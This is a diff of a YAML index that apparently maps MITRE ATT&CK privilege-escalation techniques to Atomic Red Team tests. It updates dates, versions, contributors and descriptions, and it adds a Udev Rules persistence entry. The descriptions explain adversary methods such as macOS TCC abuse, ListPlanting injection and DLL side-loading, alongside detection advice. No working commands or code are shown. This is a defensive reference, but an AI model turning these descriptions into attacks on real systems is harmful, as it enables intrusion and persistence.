   T1055.005:
     technique:
@@ -22838,7 +23123,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22882,8 +23167,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -22919,7 +23202,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22938,12 +23221,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22993,12 +23275,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23031,9 +23312,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -23050,9 +23332,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -23098,7 +23379,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests:
     - name: EXO - Full access mailbox permission granted to a user
@@ -23154,33 +23434,15 @@ privilege-escalation:
         elevation_required: false
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23188,6 +23450,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23195,7 +23459,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23225,7 +23489,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23271,7 +23534,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23316,8 +23579,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23343,7 +23604,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23369,59 +23630,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23438,6 +23668,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23452,21 +23685,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23511,9 +23775,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23570,8 +23833,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23580,7 +23843,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23622,7 +23884,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23647,12 +23909,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23692,8 +23953,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23701,13 +23964,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23738,17 +24001,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -23811,7 +24071,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -23845,8 +24105,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -23855,6 +24115,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -23867,7 +24131,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -23970,9 +24233,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -24008,7 +24329,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -24032,12 +24353,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -24121,11 +24441,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -24177,9 +24496,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
